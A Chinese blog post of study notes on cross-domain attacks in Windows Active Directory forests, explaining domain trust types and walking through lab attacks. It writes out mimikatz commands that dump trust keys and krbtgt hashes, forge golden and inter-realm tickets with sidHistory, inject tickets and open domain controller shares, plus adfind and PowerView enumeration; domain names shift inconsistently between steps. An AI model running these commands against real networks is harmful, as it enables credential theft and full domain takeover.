当前位置:网站首页>内网学习笔记(7)
内网学习笔记(7)
2022-06-24 21:56:00 【七六九】
跨域攻击及防御
很多大型企业都拥有自己的内网,一般通过域林进行共享资源。根握不同职能区分的部门,从逻辑上以主域和子域进行划分,方便统一管理。在物理层,通常使用防火墙将各个子公司及各个部门划分为不同的区域。攻击者如果得到了某个子公司或者某个部门
的域控制器权限,但没有得到整个公司的内网全部权限,往往会想办法获取其他部门或者域的权限。因此,在部署网络边界时,,如果能了解攻击者是如何对现有网络讲行跨域攻击的,就可以更安全地部署内网还我、更有效地防范攻击行为。
1. 跨域攻击方法
跨域常见的跨域攻击方法有:(例如利用 Web漏洞跨域获取权限);利用已知域散列值进行哈希传递攻击或票据传递攻击(例如域控制器本地管理员密码可能相同);利用域信任关系进行跨域攻击。
2. 利用域信任关系的跨域攻击分析
域信任的作用是解决多域环境中的跨域资源共享问题。
域环境不会无条件地接收来自其他域的凭证,只会接收来自受信任的域的凭证。在默认情况下,特定 Windows域中的所有用户都可以通过该域中的资源进行身份验证。通过这种方式,域可以为其用户提供对该域中所有资源的安全访问机制。如果用户想要访问边界以外的资源,需要使用域信任。
域信任作为域的一种机制,允许另一个域的用户在通过身份验证后访问本域中的资源。同时,域信任利用 DNS 服务器定位两个不同子域的域控制器,如果两个域中的域控制器都无法找到另一个域,也就不存在通过域信任关系讲行跨域资源共享了。
2.2 域信任关系分析
域信任关系分为单向信任和双向信任两种。
- 单向信任是指在两个域少间创建的向的信任路径,即在一个方向上是访问流。在受信任城和信任域之间的单向信任中,受信任域内的用户(或者计算机)可以访问信任域内的资源,但信任域内的用户无法访问受信任域内的资源。也就是说,若A域信任B域,那么B域内受信任的主体可以访问A域内信任B域的资源。
- 双向信任是指两个单向信任的组合,信任域和受信任域彼此信任,在两个方向上都有信任流和访问流。这意味着,可以从两个方向在两个域之间传递身份验证请求。活动目录中的所有域信任关系都是双向传递的。在创建子域时,会在新的子域和父域之间自动创建双向可传递信任关系,从下级域发出的身份验证请求可以通过其父域向上流向信任域。
信任关系可以分为内部信任和外部信任两种。
- 在默认情况下,伸用活动目录安装向导将新域添加到域树或林根域中,会自动创建双向可传递信任。在现有林中创建域树时,将建立新的树根信任,当前域树中的两个或多个域之间的信任关系被称为内部信任。这种信任关系是可传递的。例如,有三个子域BA,CA,DA,BA域信任CA域,CA域信任DA域,则BA域也信任DA域。
- 外部信任是指两个不同林中的域的信任关系。外部信任是不可传递的,而且是单向的。从Windows server 2003域信任关系变为双向的,且可以通过信任关系进行传递。在Windows操作系统中,只有Domain Admins组中的用户管理域信任关系。
2.3 获取域信息
在域中,Enterprise Admins组(仅出现在林的根域中)的成员具有对目录林中所有域的完全控制权限。在默认情况下,该组包含林中所有域控制器上具有 Administrators权限的成员。
在这里要使用LG.exe工具。LG.exe是一款使用C++编写的用于管理本地用户组和域本地用户组的命令行工具。在渗透测试中使用该工具,可以枚举远程主机用户和组的信息。
2.4 利用域信任密钥获取目标域的权限
首先,搭建符合条件的域环境。域林内信任环境的具体情况如下
- 父域的域控制器: pentest.lab ( Windows Server 2012 R2 )。
- 子域的域控制器: us.pentest.lab( Windows Server 2012 R2 )。
- 子域内的计算机: pc.us.pentest.test.com ( Windows 7)。
- 子域内的普通用户: us\test
在本实验中,使用mimikatz在域控制器中导出并伪造信任密钥,使用kekeo请求访问目标域中目标服务的TGS票据。使用这两个工具,渗透测试人员便可以创建具有sidHistory 的票据,对目标域进行安全测试。
在us.pentest.lab.com中使用mimikatz获取需要的信息,命令如下。
mimikatz.exe privilege::debug "lsadump::lsa /patch /user:test$" "lsadump::trust /patch" exit

获取信息后,在域内计算机( pc.us.pentest.test.com )中使用普通域用户权限( sub\test )执行即可。
使用mimikatz创建信任票据
mimikatz "Kerberos::golden /domain:sub.test.com /sid S-1-5-21-3265761439-1148378407-2742098900 /sids:S-1-5-21-2850215151-526022293-2118279608 /rc4:3e0208a9073c8be3801600f311457fcd /user:DarthVader /service:krbtgt /target:pentest.lab /ticket:test.kirbi" exit
domain 参数用于指定当前域名; sid 参数用于指定当前域的SID; sids 参数用于指定目标域的SID(在本实验中为519,表示渗透测试人员创建的用户属于目标域的管理员组); rc4 参数用于指定信任密钥; user 参数用于指定伪造的用户名; service 参数用于指定要访问
的服务; target 参数用于指定目标域名; ticket 参数用于指定保存票据的文件名。需要注意的是,第一次访问域控制器时的提示文字重复是由mimikatz执行时的输出异常造成的。
利用刚刚创建的名为test.kirbi的信任票据获取域中目标服务的TGS并保存到文件中。
Asktgs test.kirbi CIFS/pentest.pentest.lab
将获取的TGS票据注入内存
Kirbikator lsa CIFS.pentest.pentest.lab.kirbi
访问目标服务
dir \\dc.test.com\C$
2.5 利用krbtgt散列值获取目标域的权限
使用mimikaz,可以在构建黄金票据时设置sidHistory。因此,如果攻击者获取了林内任意域的krbtgt散列值,就可以利用sidHistory获得该林的完整权限。下面我们就来分析这一过程。首先,使用PowerView在域内计算机( pc.sub.test.com )中使用普通城用户( sub\test )权限获取当前域和目标域的SID。获取域用户SID的常用命令有"wmic useraccount get name,sid" "whoami/user" "adfind.exe -sc u:test|findstr sid" "powerview"。
在域控制器上使用mimikatz获取krbtgt 散列值。
mimikatz.exe privilege::debug "lsadump::lsa /patch /user:krbtgt"
sekurlsa::krbtgt exit
sekurlsa::krbtgt
在子域内的计算机上使用普通用户权限(sub\test)构造并注入黄金票据,获取目标域的权限。
mimikatz "Kerberos::golden /user:Administrator /domain:sub.test.com /sid: /sids: /krbtgt: /ptt" exit
user参数用于指定用户名: domain参数用于指定当前域名: sid参数用于当前城的SID; sids参数用于指定目标域的SID(在本实验中为519,代表渗透测试人员创建的户属于目标域的管理员组): krbtgt 参数指定krbtgt散列值: ptt 表示将票据往人内存。
输人如下命令,访问目标服务
dir \\dc.test.com\C$
2.6 外部信任和林信任
在本实验中,林信任环境的情况如下。
当前林的城控制器: dc.a.com ( Windows Server 2012 R2).
目标林的域控制器: bdc. b.com ( Windows Server 2012 R2 )
当前域的域控制器: adc1.a.com ( WindowServer 2012 R2)
目标域的城控制器: bdc1.b.com ( Windows Sever 212)
外部信任环境的信任关系
nltest /domain_trusts
1.利用信任关系获取信任域的信息
因为外部信任和林信任中存在SID过滤机制,所以无法利用SID History获取权限。
在本实验中,使用adfind 工具获取信任域的完整信息。下面以获取Administrator用户的详细信息
输入如下命令,导出全部用户的信息
adfind -h bdc1.b.com -sc u:Administrator
通过对比目标域和当前域的用户列表,找出同时加入这两个域的用户。
2.使用PowerView定位敏感用户
执行如下命令,列出目标域用户组中的外部用户
..\PowerView.ps1
Get-DomainForeignGroupMember -Domain B.com
2.7 利用无约束委派和MS-RPRN获取信任林权限
如果攻击者已经获取了域林中某个域权限,就可以使用MS RPRN的RpcRemoteFindPrinterChangeNotification(Ex)方法,使信任林的城=域控制器向已被控制的服务器发送身份认证请求,利用捕获的偏偏据获取信任林内任意用户的散列值。
3. 防范跨域攻击
内网中的Web应用比公网中的Web应用更脆弱。放置在公网中的Web应用服务器住往会配置WAF等设备,还会有专业的维护人员定期进行安全检测。放置在内网中的Web应用服务器
大多为内部办公使用(或者作为测试服务器使用),所以,其安全性受重视程度较低,往往会使用弱口令或者存在未及时修复的补丁。
攻击者在获取当前域的域控制器的权限后,会检查城控制器的本地管理员密码是否与其他的域控制器本地管理员密码相同,以及在两个域之间的网络没有被隔离的情况下是否可以通过哈希传递进行横向攻击等。在很多公司中,虽然为不同的部门划分了不同的域,但域管理员可能是同一批人,因此可能出现域管理员的用户名和密码相同的情况。在日常网络维护中,需要养成良好的安全习惯,才能有效地防范跨域攻击。
边栏推荐
- tmux 如何自定义背景颜色 | How does the tmux color palette work?
- 谈谈飞书对开发工作的优势 | 社区征文
- Taishan Office Technology Lecture: a simple study of Chinese punctuation in vertical arrangement
- Texture enhancement
- PHP easywechat and applet realize long-term subscription message push
- 字符串数组转换为list集合
- Abnova丨CSV 磁珠中英文说明
- 字符串常用方法
- 安超云:“一云多芯”支持国家信创政务云落地
- 非凸联合创始人李佐凡:将量化作为自己的终身事业
猜你喜欢
![Full arrangement ii[duplicate removal of the same elements + standard backtracking]](/img/d3/93ddb49e580be60be4f056f141b782.png)
Full arrangement ii[duplicate removal of the same elements + standard backtracking]
![全排列II[存在相同元素去重 + 标准回溯]](/img/d3/93ddb49e580be60be4f056f141b782.png)
全排列II[存在相同元素去重 + 标准回溯]

Abnova丨BSG 单克隆抗体中英文说明

Icml2022 | establishing a continuous time model of counterfactual results using neural control differential equations

MeterSphere开源持续测试平台与阿里云云效DevOps的集成

入职一家新公司,如何快速熟悉代码?

海河实验室创新联合体成立 GBASE成为首批创新联合体(信创)成员单位

非凸联合创始人李佐凡:将量化作为自己的终身事业

Huawei laptop, which grew against the trend in Q1, is leading PC into the era of "smart office"

明日考试 最后一天如何备考?二造考点攻略全整理
随机推荐
(CVPR 2020) Learning Object Bounding Boxes for 3D Instance Segmentation on Point Clouds
Unity C# 网络学习(六)——FTP(一)
Redis persistence
After integrating the aurora push plug-in in the uni app, the real machine debugging prompts "the currently running base does not contain the native plug-in [jg-jpush]..." Solutions to problems
TSDB在民机行业中的应用
Install mysql5.6 under linux64bit - the root password cannot be modified
AssertionError: CUDA unavailable, invalid device 0 requested
Is CICC securities reliable? Is it safe to open a securities account?
Chinese address and English address
MOS管相关知识
Deoxyribonuclease I instructions in Chinese and English
泰山OFFICE技术讲座:竖排时中文标点的简单研究
DDD概念复杂难懂,实际落地如何设计代码实现模型?
IPC mechanism
sql 聚合函数对 null 的处理[通俗易懂]
PMP考试“临门一脚”如何踢得漂亮?
Abnova丨A4GNT多克隆抗体中英文说明
‘distutils‘ has no attribute ‘version
第04天-文件IO
Hands on data analysis data modeling and model evaluation